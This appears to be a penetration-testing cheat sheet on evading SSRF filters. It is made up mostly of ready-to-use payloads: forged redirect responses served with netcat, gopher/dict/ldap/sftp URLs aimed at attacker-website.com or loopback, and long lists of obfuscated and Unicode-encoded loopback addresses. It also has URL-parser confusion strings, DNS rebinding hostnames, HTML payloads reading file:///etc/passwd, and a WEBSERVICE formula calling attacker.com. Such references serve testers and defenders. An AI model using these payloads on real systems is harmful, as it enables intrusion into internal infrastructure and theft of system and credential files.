Server Side Request Forgery

Search…
Server-side request forgery (or SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.
In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.
Bypass filters
Applications often block input containing non-whitelist hostnames, sensitive URLs, or IP addresses like loopback, IPv4 link-local, private addresses, etc. In this situation, it is sometimes possible to bypass the filter using various techniques.
Redirection
You can try using a redirection to the desired URL to bypass the filter. To do this, return a response with the 3xx code and the desired URL in the Location header to the request from the vulnerable server, for example:
1
HTTP/1.1 301 Moved Permanently
2
Server: nginx
3
Connection: close
4
Content-Length: 0
5
Location: http://127.0.0.1
Copied!
You can achieve redirection in the following ways:
bash, like nc -lvp 80 < response.txt
URL shortener services
Mock and webhook services, see here​
More flexible solutions such as a simple HTTP server on python
Also, if the application contains an open redirection vulnerability you can use it to bypass the URL filter, for example:
1
POST /api/v1/webhook HTTP/1.1
2
Host: vulnerable-website.com
3
Content-Type: application/x-www-form-urlencoded
4
Content-Length: 101
5
​
6
url=https://vulnerable-website.com/api/v1/project/next?currentProjectId=1929851&path=http://127.0.0.1
Copied!
These bypass approaches work because the application only validates the provided URL, which triggers the redirect. It follows the redirect and makes a request to the internal URL of the attacker's choice.
URL scheme
You can try to use different URL schemes:
1
file://path/to/file
2
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
3
dict://127.0.0.1:1337/stats
4
ftp://127.0.0.1/
5
sftp://attacker-website.com:1337/
6
tftp://attacker-website.com:1337/TESTUDPPACKET
7
ldap://127.0.0.1:389/%0astats%0aquit
8
ldaps://127.0.0.1:389/%0astats%0aquit
9
ldapi://127.0.0.1:389/%0astats%0aquit
10
gopher://attacker-website.com/_SSRF%0ATest!
Copied!
Node.js
Node.js for Windows considers any single letter in a URL scheme as drive://filepath and set the protocol to file://.
1
// Node.js (Windows only)
2
// the following row will return `file:`
3
new URL('l://file').protocol
Copied!
References:
​@PwnFunction tweet​
Java
Java's URL will correctly handle the next URLs:
1
url:file:///etc/passwd
2
url:http://127.0.0.1:8080
Copied!
References:
@phithon_xg tweets 1 and 2​
IP address formats
You can try using a different IP address format to bypass the filter.
Rare IP address
Rare IP address formats, defined in RFC 3986:
Dotted hexadecimal IP: 0x7f.0x0.0x0.0x1
Dotless hexadecimal IP: 0x7f001
Dotless hexadecimal IP with padding: 0x0a0b0c0d7f000001 (padding is 0a0b0c0d)
Dotless decimal IP: 2130706433
Dotted decimal IP with overflow (256): 383.256.256.257
Dotted octal IP: 0177.0.0.01
Dotless octal IP: 017700000001
Dotted octal IP with padding: 00177.000.0000.000001
Combined:
1
0x7f.0.1
2
0x7f.1
3
00177.1
4
00177.0x0.1
Copied!
You can short-hand IP addresses by dropping the zeros:
1
1 part  (ping A)       : 0.0.0.A
2
2 parts (ping A.B)     : A.0.0.B
3
3 parts (ping A.B.C)   : A.B.0.C
4
4 parts (ping A.B.C.D) : A.B.C.D
5
​
6
0       => 0.0.0.0
7
127.1   => 127.0.0.1
8
127.0.1 => 127.0.0.1
Copied!
IPv6 address
IPv6 localhost:
1
[::]
2
0000::1
3
[::1]
4
0:0:0:0:0:0:0:0
Copied!
IPv4-mapped IPv6 address: [::ffff:7f00:1]
IPv4-mapped IPv6 address: [::ffff:127.0.0.1]
IPv4-compatible IPv6 address (deprecated, q.v. RFC4291: [::127.0.0.1]
IPv4-mapped IPv6 address with zone identifier: [::ffff:7f00:1%25]
IPv4-mapped IPv6 address with zone identifier: [::ffff:127.0.0.1%eth0]
Abuse of enclosed alphanumerics
Enclosed alphanumerics is a Unicode block of typographical symbols of an alphanumeric within a circle, a bracket or other not-closed enclosure, or ending in a full stop, q.v. list.
1
127。0。0。1
2
127｡0｡0｡1
3
127．0．0．1
4
⑫７｡⓪．𝟢。𝟷
5
𝟘𝖃𝟕𝒇｡𝟘𝔵𝟢｡𝟢𝙭⓪｡𝟘𝙓¹
6
⁰𝔁𝟳𝙛𝟢０１
7
２𝟏𝟑𝟢𝟕𝟢６𝟺𝟛𝟑
8
𝟥𝟪³。𝟚⁵𝟞。²₅𝟞。²𝟧𝟟
9
𝟢₁𝟳₇｡０｡０｡𝟢𝟷
10
𝟎𝟢𝟙⑦⁷。０００。𝟶𝟬𝟢𝟘。𝟎₀𝟎𝟢０𝟣
11
[::𝟏②₇．𝟘．₀．𝟷]
12
[::𝟭２𝟟｡⓪｡₀｡𝟣%𝟸𝟭⑤]
13
[::𝚏𝕱ᶠ𝕗:𝟏₂７｡₀｡𝟢｡①]
14
[::𝒇ℱ𝔣𝐹:𝟣𝟤７。₀。０。₁%②¹𝟧]
15
𝟎𝚇𝟕𝖋｡⓪｡𝟣
16
𝟎ˣ𝟩𝘍｡𝟷
17
𝟘𝟘①𝟕⑦．１
18
⓪𝟘𝟙𝟳𝟽｡𝟎𝓧₀｡𝟏
Copied!
Abusing a bug in Ruby's native resolver
Resolv::getaddresses is OS-dependent, therefore by playing around with different IP formats one can return blank values.
Proof of concept:
1
irb(main):001:0> require 'resolv'
2
=> true
3
irb(main):002:0> uri = "0x7f.1"
4
=> "0x7f.1"
5
irb(main):003:0> server_ips = Resolv.getaddresses(uri)
6
=> [] # The bug!
7
irb(main):004:0> blocked_ips = ["127.0.0.1", "::1", "0.0.0.0"]
8
=> ["127.0.0.1", "::1", "0.0.0.0"]
9
irb(main):005:0> (blocked_ips & server_ips).any?
10
=> false # Bypass
Copied!
References:
​Bypassing Server-Side Request Forgery filters by abusing a bug in Ruby's native resolver​
​Report: Blind SSRF in "Integrations" by abusing a bug in Ruby's native resolver​
​Report: SSRF vulnerability in gitlab.com via project import​
Broken parser
The URL specification contains a number of features that are liable to be overlooked when implementing ad hoc parsing and validation of URLs:
Embedded credentials in a URL before the hostname, using the @ character: https://[email protected]
Indication a URL fragment using the # character: https://evil-host#expected-host
DNS naming hierarchy: https://expected-host.evil-host
URL-encode characters. This can help confuse URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
Combinations of these techniques together:
1
[email protected]:[email protected]
2
[email protected]%[email protected]
3
evil-host%09expected-host
4
127.1.1.1:80\@127.2.2.2:80
5
127.1.1.1:80:\@@127.2.2.2:80
6
127.1.1.1:80#\@127.2.2.2:80
7
ß.evil-host
Copied!
References:
​Writeup: URL whitelist bypass in https://cxl-services.appspot.com​
​Writeup: Fixing the Unfixable: Story of a Google Cloud SSRF​
​A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!​
​Tool: Tiny URL Fuzzer​
DNS pinning
If you want to get a A-record that resolves to an IP, use the following subdomain:
1
make-<IP>-rr.1u.ms 
Copied!
For example, domain resolves make-127-0-0-1-rr.1u.ms to 127.0.0.1:
1
$ dig A make-127-0-0-1-rr.1u.ms
2
make-127-0-0-1-rr.1u.ms. 0	IN	A	127.0.0.1
Copied!
Multiple records can be separated by -and-:
1
make-<IP>-and-<IP>-rr.1u.ms
Copied!
For example, domain resolves make-127-0-0-1-and-127-127-127-127-rr.1u.ms to 127.0.0.1 and 127.127.127.127:
1
$ dig A make-127-0-0-1-and-127-127-127-127-rr.1u.ms
2
make-127-0-0-1-and-127-127-127-127-rr.1u.ms. 0 IN A 127.0.0.1
3
make-127-0-0-1-and-127-127-127-127-rr.1u.ms. 0 IN A 127.127.127.127
Copied!
GitHub - neex/1u.ms
GitHub
Also, check sslip.io:
Welcome to sslip.io
DNS rebinding
If the mechanisms in vulnerable application for checking and establishing a connection are independent and there is no caching of the DNS resolution response, you can bypass this by manipulating the DNS resolution response.
For example, if two requests go one after the other within 5 seconds, DNS resolution make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms will return the address 1.1.1.1 by the first request, and the second - 127.0.0.1.
1
$ dig A make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms
2
make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms. 0 IN A 1.1.1.1
3
​
4
$ dig A make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms
5
make-1-1-1-1-rebind-127-0-0-1-rr.1u.ms. 0 IN A 127.0.0.1
Copied!
GitHub - neex/1u.ms
GitHub
Also, check lock.cmpxchg8b.com:
rbndr.us dns rebinding service
Adobe ColdFusion
SSRF in ColdFusion/CFML Tags and Functions
FFmpeg
​Viral Video Exploiting Ssrf In Video Converters​
​Attacks on video converters: a year later​
​Report: SSRF and local file disclosure in https://wordpress.com/media/videos/ via FFmpeg HLS processing​
​Report: SSRF / Local file enumeration / DoS due to improper handling of certain file formats by ffmpeg​
​Tool: ffmpeg-avi-m3u-xbin​
SVG
GitHub - allanlw/svg-cheatsheet: A cheatsheet for exploiting server-side SVG processors.
GitHub
Server-side processing of arbitrary HTML and JS
Server-side processing of arbitrary HTML and JS data from a user can often be found when generating various documents, for example, to PDFs. If this functionality is vulnerable to HTML injection and/or XSS, you can use this to access internal resources:
1
<iframe src="file:///etc/passwd" width="400" height="400">
2
<img src onerror="document.write('<iframe src=//127.0.0.1></iframe>')">
Copied!
Use HTTPLeaks to determine if any of the allowed HTML tags could be used to abuse the processing.
GitHub - cure53/HTTPLeaks: HTTPLeaks - All possible ways, a website can leak HTTP requests
GitHub
References:
​Write up: Local File Read via XSS in Dynamically Generated PDF​
​Write up: Exploiting HTML-to-PDF Converters through HTML Imports​
​Report: Blind SSRF/XSPA on dashboard.lob.com + blind code injection​
​Report: Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints​
Spreadsheet exporting
If an application is running on a Windows server and exporting to a spreadsheet try to use WEBSERVICE function to gain a SSRF:
1
=WEBSERVICE('https://attacker.com')
Copied!
References:
​@intigriti tweet​
Request splitting
Security Bugs in Practice: SSRF via Request Splitting
rfkelly
HTTP headers
Many applications use in their flows IP addresses/domains, which they received directly from users in different HTTP headers, such as the X-Forwarded-For or Client-IP headers. Such application functionality can lead to a blind SSRF vulnerability if the header values are not properly validated.
This is where the param-miner can be useful for searching the HTTP headers.
Referer header
Also notice the Referer header, which is used by server-side analytics software to track visitors. Such software often logs the Referer header from requests, since this allows to track incoming links.
The analytics software will actually visit any third-party URL that appears in the Referer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.
References
​Web Security Academy: Server-side request forgery (SSRF)​
​Blind SSRF exploitation​
​PayloadsAllTheThings: Server Side Request Forgery​
​Report: SSRF in CI after first run​
​Report: GitLab::UrlBlocker validation bypass leading to full Server Side Request Forgery​
​Report: Gitlab DNS rebinding protection bypass​
​Write up: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!​